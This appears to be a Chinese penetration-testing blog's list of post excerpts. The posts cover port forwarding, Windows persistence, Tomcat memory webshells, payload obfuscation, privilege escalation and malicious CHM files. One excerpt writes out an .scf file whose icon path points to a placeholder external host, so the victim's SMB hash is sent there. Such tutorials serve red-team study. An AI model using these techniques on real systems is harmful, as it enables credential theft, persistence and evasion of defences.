网络隧道技术总结 windows netsh端口转发12345678910开启转发netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport查看存在的转发netsh interface portproxy sho 2021-08-09 代理 代理
windows持久化总结 启动项在启动路径中存入后门 1C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 启动项注册表 1234HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\Softwar 2021-08-05 持久化 持久化
tomcat无文件内存webshell tomcat三种内存马filter型 servlet型 listener型 执行优先级是listener -> filter -> servlet filter型内存马原理filter是javaweb中的过滤器,会对客户端发送的请求进行过滤并做一些操作,我们可以在filter中写入命令执行的恶意文件,让客户端发来的请求通过它来做命令执行。 而filter内存马是通过动态注册一个恶意fi 2021-06-29 webshell webshell
利用强制smb身份验证获取用户哈希 前言攻击者可通过向共享目录投递连接外部服务器的资源文件,用户请求过程中尝试身份验证,会默认使用SMB协议将用户哈希发送到服务器,这样攻击者就会获取对方用户账户哈希。 创建共享目录scf文件12345[Shell]Command=2IconFile=\\X.X.X.X\share\1.ico[Taskbar]Command=ToggleDesktop 重命名后缀为.scf,保存在共享目录 使用re 2021-06-27 钓鱼 smb
带后门webshell制作 前言多年前直接拿别人的免杀webshell或者大马使用时,经常会遇到在木马里留后门的情况,这种木马对我们自身机器没有什么危害,但是在我们使用的时候,上传webshell的地址与连接密码会被木马作者获取。 简单的说就是你的shell就是我的shell,被窃取劳动成果还是很不爽的。 所以本文打算把webshell后门的制作的办法总结一篇文档,以后面对这些木马就更知己知彼,有办法给它把后门去掉。 原理w 2021-06-18 webshell webshell
通过恶意chm文件getshell 前言chm是Compiled HTML Help file的缩写,意为已编译的HTML帮助文件,当攻击者将恶意代码写入chm中,当用户点击就会执行预设的恶意命令。 chm命令执行示例下载安装html help workshop 使用html help workshop创建新项目,选择一个.hhp文件为目标 创建并添加恶意html文件(执行calc),内容如下 123456789101112&l 2021-06-18 钓鱼 钓鱼
渗透测试各阶段工具速查(持续更新) 前言本文是渗透测试各阶段工具和快速用法速查笔记,将会持续更新。(2020-08-07更新)(2021-06-17更新) 站点信息收集12345678GoogleFofaShodanZoomeyeGobywhatwebGithubrobtex 快速探测存活主机ping 123456789101112#!/bin/bashfor i in {1..255};do host=19 2021-06-17 渗透测试 渗透测试
提权扫描工具一览 使用Windows-Exploit-Suggester解析systeminfohttps://github.com/AonCyberLabs/Windows-Exploit-Suggester 1./windows-exploit-suggester.py 使用Linux-Exploit-Suggester.sh寻找linux提权问题https://github.com/mzet-/linux-e 2021-06-09 提权 提权
使用Invoke-Obfuscation对恶意powershell编码隐藏特征 使用cs生成powershell payload 使用Invoke-Obfuscation对其aes加密下载 https://github.com/danielbohannon/Invoke-Obfuscation 加密payload 1234567Import-Module .\Invoke-Obfuscation.ps1Invoke-Obfuscationset scriptpath .\p 2021-06-09 bypass bypass
AlwaysInstallElevated提权 AlwaysInstallElevated提权windows有一个系统进程MSIEXEC,用于安装Windows Installer安装包,AlwaysInstallElevated是一个组策略配置,如果启用,那么将允许普通用户以SYSTEM权限运行msi文件进行安装。如果对方机器恰好开启,我们就可以利用此缺陷提权。 powerup下载链接: https://github.com/PowerShe 2021-06-09 提权 提权